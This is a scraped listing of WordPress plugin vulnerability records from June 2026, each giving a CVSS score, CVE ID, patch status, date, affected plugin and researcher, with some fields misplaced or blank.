Swift Website Updates & Maintenance

ARMember Premium – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup [armember]

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-5076

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Researcher

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-48836

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Easy Invoice – Invoice Generator, PDF Quotes & Payments [easy-invoice]

Researcher

Nguyen Dinh Hai (HaiND)

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-10580

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Hippoo Mobile App for WooCommerce [hippoo]

Researcher

Mitchell

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-8206

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Kirki – Freeform Page Builder, Website Builder & Customizer [kirki]

Researcher

CHOIGYEONGMIN

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-49777

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Product Slider Pro for WooCommerce [woo-product-slider-pro]

Researcher

Shane

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-27395

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Support Board [supportboard]

Researcher

CVSS Rating
9.1 (Critical)

CVE-ID

CVE-2026-48866

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Gravity Forms [gravityforms]

Researcher

CVSS Rating
9.1 (Critical)

CVE-ID

CVE-2026-9690

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Media folder Addon [wp-media-folder-addon]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-7654

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Admin Columns [codepress-admin-columns]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-48889

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Booking for Appointments and Events Calendar – Amelia [ameliabooking]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-1829

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Content Visibility for Divi Builder [content-visibility-for-divi-builder]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-1829

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Content Visibility for Divi Builder [content-visibility-for-divi-builder]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-49113

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Cornerstone [cornerstone]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-49780

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy [dokan-lite]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-49083

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

LatePoint – Calendar Booking Plugin for Appointments and Events [latepoint]

Researcher

VanTastic

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-49774

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

RD Station [integracao-rd-station]

Researcher

ParkHyunWoo

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-5415

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Advanced Google reCAPTCHA [advanced-google-recaptcha]

Researcher

CVSS Rating
8.8 (High)

CVE-ID

CVE-2026-5411

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Advanced Google reCAPTCHA [advanced-google-recaptcha]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49768

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Happyforms – Form Builder for WordPress: Drag & Drop Contact Forms, Surveys, Payments & Multipurpose Forms [happyforms]

Researcher

longnv719

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-9691

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms [cf7-active-campaign]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49106

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms [cf7-constant-contact]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49763

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms [cf7-hubspot]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49104

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Integration for Keap/infusionsoft and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms [cf7-infusionsoft]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49765

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Integration for Mailchimp and Contact Form 7, WPForms, Elementor, Ninja Forms [cf7-mailchimp]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49109

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms [cf7-salesforce]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49108

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Moderno – Fashion & Clothing, Furniture [moderno]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49781

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

OttoKit: All-in-One Automation Platform [suretriggers]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-27410

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

SlimStat Analytics [wp-slimstat]

Researcher

Drew Webber (mcdruid)

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49107

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Thrive Apprentice [thrive-apprentice]

Researcher

dutafi

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49085

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WP Insightly for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms [cf7-insightly]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49770

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

WP Travel Engine – Tour Booking Plugin – Tour Operator Software [wp-travel-engine]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49766

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WP User Manager – User Profile Builder & Membership [wp-user-manager]

Researcher

endy

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49105

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms [cf7-zendesk]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-49769

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

wpForo Forum [wpforo]

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-42761

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Active Products Tables for WooCommerce. Use constructor to create tables [profit-products-tables-for-woocommerce]

Researcher

ARMember Premium – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup [armember]

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-5073

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-49776

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

GPTranslate – Multilingual AI Translation for WordPress: Automatically Translate Websites [gptranslate]

Researcher

Nguyen Dinh Hai (HaiND)

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-49079

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

JetSearch [jet-search]

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-48875

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

JetSmartFilters [jet-smart-filters]

Researcher

Austin Ginder

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-48886

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

JS Help Desk – AI-Powered Support & Ticketing System [js-support-ticket]

Researcher

sequence_X0

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-10737

Patch Status
Unpatched

Published
Jun 3, 2026

Affected Software

SP Project & Document Manager [sp-client-document-manager]

Researcher

Namdn

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-9290

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WP User Manager – User Profile Builder & Membership [wp-user-manager]

Researcher

Yat

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-8438

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

All-In-One Security (AIOS) – Security and Firewall [all-in-one-wp-security-and-firewall]

Researcher

Dmitrii Ignatyev

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-42775

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress [automatorwp]

Researcher

Md. Moniruzzaman Prodhan (NomanProdhan)

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-9851

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Booking Package [booking-package]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-39435

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

cformsII [cforms2]

Researcher

Ilay Striechman

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-49055

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

Drag and Drop Multiple File Upload for Contact Form 7 [drag-and-drop-multiple-file-upload-contact-form-7]

Researcher

fayespiegel

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-5305

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Email Address Encoder [email-address-encoder]

email-encoder-premium [email-encoder-premium]

Researcher

stealthcopter

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-48966

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

FunnelKit – Funnel Builder for WooCommerce Checkout [funnel-builder]

Researcher

Tiago Ventura (perses)

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-10586

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns [essential-blocks]

Researcher

Shambles

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-48885

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

HollerBox — Fast & Effective Popups & Lead-Generation [holler-box]

Researcher

Peleg Nagli (ultrared.ai)

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-8901

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Integration for Freshsales – Contact Form 7, WPForms, Elementor, Gravity Forms and More [crm-integration-freshworks-any-form]

Researcher

PeterPatter

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-7537

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

MDJM Event Management [mobile-dj-manager]

Researcher

Ryan Kozak

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-48871

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

MW WP Form [mw-wp-form]

Researcher

VanTastic

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-45437

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Product Filter Widget for Elementor [product-filter-widget-for-elementor]

Researcher

Evan NR

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-48867

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker [quiz-master-next]

Researcher

endy

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-48876

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Stop Spammers Classic [stop-spammer-registrations-plugin]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-42762

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

VikBooking Hotel Booking Engine & PMS [vikbooking]

Researcher

anhcd05

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-39451

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

WP Google Review Slider [wp-google-places-review-slider]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-48839

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

WP Statistics – Simple, privacy-friendly Google Analytics alternative [wp-statistics]

Researcher

ARMember Premium – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup [armember]

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-49778

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

WPFunnels Pro [wpfunnels-pro]

Researcher

dutafi

CVSS Rating
6.6 (Medium)

CVE-ID

CVE-2026-7566

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

LearnPress – Backup & Migration Tool [learnpress-import-export]

Researcher

Wannes Verwimp

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-5074

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-48964

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

ELEX WordPress HelpDesk & Customer Ticketing System [elex-helpdesk-customer-support-ticket-system]

Researcher

Mukhlis Amien

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-48874

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress [gamipress]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-48967

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

Geo Mashup [geo-mashup]

Researcher

Jonathan Dersch

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-8653

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

MasterStudy LMS Pro [masterstudy-lms-learning-management-system-pro]

Researcher

Rafie Muhammad

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-49771

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Photo Gallery by 10Web – Mobile-Friendly Image Gallery [photo-gallery]

Researcher

Jonah Burgess (CryptoCat)

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-9829

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Photo Gallery by 10Web – Mobile-Friendly Image Gallery [photo-gallery]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-48882

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

WP Time Slots Booking Form [wp-time-slots-booking-form]

Researcher

xwii

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-3722

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Auto Image Attributes From Filename With Bulk Updater (Add Alt Text, Image Title For Image SEO) [auto-image-attributes-from-filename-with-bulk-updater]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-7795

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Click to Chat – HoliThemes [click-to-chat-for-whatsapp]

Researcher

Valatty

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8885

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

DeMomentSomTres Shortcodes [demomentsomtres-shortcodes]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-4080

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Easy Cart [easy-cart]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-7796

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

EmbedPress – PDF Embedder, Embed PDF viewer, YouTube Videos, 3D FlipBook, Social feeds & more [embedpress]

Researcher

UKO

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8893

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Express Payment For Stripe [wp-stripe-express]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-2382

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

FPW Category Thumbnails [fpw-category-thumbnails]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-49773

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

FV Flowplayer Video Player [fv-wordpress-flowplayer]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-48870

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

King Addons for Elementor – 80+ Elementor Widgets, 4 000+ Elementor Templates, WooCommerce, Mega Menu, Popup Builder [king-addons]

Researcher

thevietronin

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-9281

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Master Addons For Elementor – Widgets, Extensions, Theme Builder, Popup Builder & Template Kits [master-addons]

Researchers

Kyokito

Itthidej Aramsri (Boeing777)

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-3011

Patch Status
Patched

Published
Jun 7, 2026

Affected Software

Recipe Card Blocks Lite [recipe-card-blocks-by-wpzoom]

Researchers

Itthidej Aramsri (Boeing777)

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8900

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Simple SEO Slideshow [simple-seo-slideshow]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-48880

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

WP Job Portal – AI-Powered Recruitment System for Company or Job Board website [wp-job-portal]

Researcher

Jonathan Dersch

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-4081

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

ZeM STL [zem-stl-viewer]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-9280

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Ad Inserter – Ad Manager & AdSense Ads [ad-inserter]

Researcher

darkmode

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-48869

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

enfold [enfold]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-2425

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

hiWeb Migration Simple [hiweb-migration-simple]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-48865

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

LearnPress – WordPress LMS Plugin for Create and Sell Online Courses [learnpress]

Researcher

VanTastic

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-1451

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

rognone [rognone]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-1450

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

rognone [rognone]

Researcher

CVSS Rating
5.5 (Medium)

CVE-ID

CVE-2025-5085

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

WP Nano AD [wp-nano-ad]

Researcher

siyuan shao

CVSS Rating
5.4 (Medium)

CVE-ID

CVE-2026-5191

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Tiled Gallery Carousel Without JetPack [tiled-gallery-carousel-without-jetpack]

Researcher

Webbernaut

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2019-25727

Patch Status
Unpatched

Published
Jun 5, 2026

Affected Software

10WebAdManager [ad-manager-wd]

Researcher(s): Unknown

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-25439

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Booknetic [booknetic]

Researcher

Jamshed Yergashvoyev (CVE Guy)

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-9016

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Debug Log Manager – Conveniently Monitor and Inspect Errors [debug-log-manager]

Researcher

Endang Alfarisi

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-48872

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

EmbedPress – PDF Embedder, Embed PDF viewer, YouTube Videos, 3D FlipBook, Social feeds & more [embedpress]

Researcher

Mukhlis Amien

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-7665

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Essential Addons for Elementor – Popular Elementor Templates & Widgets [essential-addons-for-elementor-lite]

Researcher

Anirudh Makkar

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-8608

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Event Monster – Event Manager, Ticket Booking & Registration [event-monster]

Researcher

NAKLEH ZEIDAN

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2019-25738

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Hybrid Composer [hybrid-composer]

Researcher(s): Unknown

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49057

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

JobSearch WP Job Board [wp-jobsearch]

Researcher

adhikara13

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-48887

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

JS Help Desk – AI-Powered Support & Ticketing System [js-support-ticket]

Researcher

Nvz

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-8502

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

LearnPress – WordPress LMS Plugin for Create and Sell Online Courses [learnpress]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-8839

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

MapPress Maps for WordPress [mappress-google-maps-for-wordpress]

Researcher

Kitch

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-48873

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Montonio for WooCommerce [montonio-for-woocommerce]

Researcher

Niv Kochan

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-48970

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

Really Simple Security – Simple and Performant Security (formerly Really Simple SSL) [really-simple-ssl]

Researcher

RyuuKhagetsu

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49764

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

RegistrationMagic – User Registration Forms Plugin [custom-registration-form-builder-with-submission-manager]

Researcher

James Paremain

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49112

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Shared Files – Frontend File Upload Form & Secure File Sharing [shared-files]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-48868

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Simple Shopping Cart [wordpress-simple-paypal-shopping-cart]

Researcher

Austin Ginder

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-27089

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Travelly – Tour & Travel Booking Manager for WooCommerce | Tour & Hotel Booking Solution [tour-booking-manager]

Researcher

benzdeus

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-48881

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

TrueBooker – Appointment Booking and Scheduler System [truebooker-appointment-booking]

Researcher

Vincent Sevkli

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49110

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Upsell Funnel Builder for WooCommerce – Create Upsells, Cross-Sells, Order Bumps, Frequently Bought, and Popups. [upsell-order-bump-offer-for-woocommerce]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49081

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

User Registration Stripe [user-registration-stripe]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49056

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes & Shipping Labels [print-invoices-packing-slip-labels-for-woocommerce]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49775

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

Welcart e-Commerce [usc-e-shop]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49077

Patch Status
Unpatched

Published
Jun 4, 2026

Affected Software

Wp EMember [wp-eMember]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-8385

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WP Go Maps – Google Maps, OpenStreetMap, Leaflet Map [wp-google-maps]

Researcher

Sudhanshu Chauhan

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49078

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WP Travel Engine – Tour Booking Plugin – Tour Operator Software [wp-travel-engine]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-48883

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

WPC Product Bundles for WooCommerce [woo-product-bundle]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-7792

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More [wpforms-lite]

Researcher

Valatty

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49767

Patch Status
Patched

Published
Jun 4, 2026

Affected Software

wpForo Forum [wpforo]

Researcher

CVSS Rating
4.9 (Medium)

CVE-ID

CVE-2026-7565

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

LearnPress – Backup & Migration Tool [learnpress-import-export]

Researcher

Wannes Verwimp

CVSS Rating
4.9 (Medium)

CVE-ID

CVE-2026-8978

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

OptinCraft – Drag & Drop Optins & Popup Builder for WordPress [optincraft]

Researcher

Yousef Alraddadi

CVSS Rating
4.9 (Medium)

CVE-ID

CVE-2026-6448

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker [quiz-master-next]

Researcher

Drew Webber (mcdruid)

CVSS Rating
4.9 (Medium)

CVE-ID

CVE-2026-9197

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Smart Slider 3 [smart-slider-3]

Researcher

Nguyen Khanh Hao

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-8991

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Drag and Drop Multiple File Upload for Contact Form 7 [drag-and-drop-multiple-file-upload-contact-form-7]

Researcher

Bao Luu Gia Nguyen

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-7421

Patch Status
Unpatched

Published
Jun 2, 2026

Affected Software

Passeum Ticketing [passeum-ticketing]

Researcher

KEVIN LEE (crattack)

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-28116

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Progress Planner [progress-planner]

Researcher

hongdo

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-2500

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Quick Playground [quick-playground]

Researcher

Pablo Santiago

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-10100

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Simple Custom Login Page [simple-custom-login-page]

Researcher

Nguyen Duong

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-3620

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Word Replacer [word-replacer]

Researcher

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-9594

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory & Filters [wp-google-map-plugin]

Researcher

Yousef Alraddadi

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-7523

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Alba Board [alba-board]

Researcher

Teerachai Somprasong

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-48965

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

Backup, Restore and Migrate your sites with XCloner [xcloner-backup-and-restore]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-4071

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

BirdSeed [birdseed]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-10038

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More [charitable]

Researcher

Khanh Nguyen

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-49082

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Chatway Live Chat – AI Chatbot, Customer Support, FAQ & Helpdesk Customer Service & Chat Buttons [chatway-live-chat]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-49782

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Elementor Website Builder – more than just a page builder [elementor]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9732

Patch Status
Unpatched

Published
Jun 2, 2026

Affected Software

EmergencyWP – Dead Man’s switch & legacy deliverance [emergencywp]

Researcher

Mohamed Wajih Hichri (Assaults)

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-27351

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Employee, Leave and Recruitment Management System – Crew HRM [hr-management]

Researcher

benzdeus

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-7047

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Frontend User Notes [frontend-user-notes]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9723

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Google Plus One Bottom [google-plus-one-bottom]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9234

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

JTL-Connector for WooCommerce [woo-jtl-connector]

Researcher

